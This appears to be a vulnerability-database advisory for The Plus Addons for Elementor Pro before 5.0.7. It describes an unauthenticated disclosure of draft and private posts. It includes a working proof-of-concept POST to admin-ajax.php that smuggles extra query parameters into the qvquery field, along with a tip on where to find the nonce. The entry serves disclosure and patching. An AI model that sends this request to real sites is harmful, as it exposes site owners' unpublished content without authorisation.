WordPress Plugin Vulnerabilities
The Plus Addons for Elementor Pro < 5.0.7 - Sensitive Data Disclosure
Description
The plugin does not validate the qvquery parameter of the tp_get_dl_post_info_ajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts
Proof of Concept
The following request allow an unauthenticated user to get the draft posts (the nonce can be retrieved by looking at the source code of pages/posts for 'var theplus_nonce = "xxxx";') POST /wp-admin/admin-ajax.php HTTP/2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 134 action=tp_get_dl_post_info_ajax&security=a71d02fefb&product_id=1&qvquery=post%26post_status=draft%26p=%26post_type=any%26nopaging=true
Affects Plugins
Fixed in version 5.0.7
References
Classification
Miscellaneous
Original Researcher
Nicolas Vidal from TEHTRIS
Submitter
Nicolas Vidal from TEHTRIS
Verified
Yes
Timeline
Publicly Published
2021-12-13 (about 5 months ago)
Added
2021-12-13 (about 5 months ago)
Last Updated
2022-04-11 (about 1 months ago)